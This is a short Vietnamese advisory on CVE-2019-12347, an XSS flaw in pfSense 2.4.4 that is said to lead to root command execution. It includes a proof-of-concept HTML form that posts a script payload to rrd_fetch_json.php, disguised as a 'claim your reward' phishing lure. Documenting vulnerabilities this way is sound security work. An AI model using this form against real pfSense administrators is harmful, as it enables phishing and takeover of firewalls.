Mô tả
Trong phiên bản pfSense 2.4.4 kẻ tấn công có thể thực hiện bất kì command nào với quyền root của hệ thống thông qua lỗ hổng XSS trong ding_command.php và rrd_fetch_json.php
Mức độ ảnh hưởng
Nếu quản trị viên để lộ thông tin quản trị web bằng cách đặt mật khẩu yếu hay click vào button của các phishing pages, vv… sẽ bị kẻ tấn sau khi xác thực được vào web quản trị sẽ thực hiện khai thác XSS.
Xem thêm tại tại https://www.cvedetails.com/cve/CVE-2019-12347/
PoC XSS
Đường dẫn bị kẻ tấn công khai thác
https://[pfSense_IP_Address]/rrd_fetch_json.php
Gửi một POST request tới đường đẫn trên
<form action="https://[PFsense-domain]/rrd_fetch_json.php" method="post"> <input type="hidden" name="left" value="system-processor"><br> <input type="hidden" name="right" value="null"><br> <input type="hidden" name="start" value=""><br> <input type="hidden" name="end" value=""><br> <input type="hidden" name="resolution" value="300"><br> <input type="hidden" name="timePeriod" value="i3i3j<script>alert(1)</script>tz9b1"><br> <input type="hidden" name="graphtype" value="line"><br> <input type="hidden" name="invert" value="true"><br> <input type="hidden" name="refreshInterval" value="0"> <h1>Congratulations on receiving the reward from us</h1> <h1>Click to receive gifts</h1> <input type="submit" value="Submit"> </form>
Kết quả trên trang web sẽ xuất hiện một alert như sau
Như vậy nếu người quản trị để lộ thông tin quản trị web sẽ dễ bị kẻ tấn công khai thác lỗ hổng này sau đó thực hiện remote command execution với quyền root của hệ thống.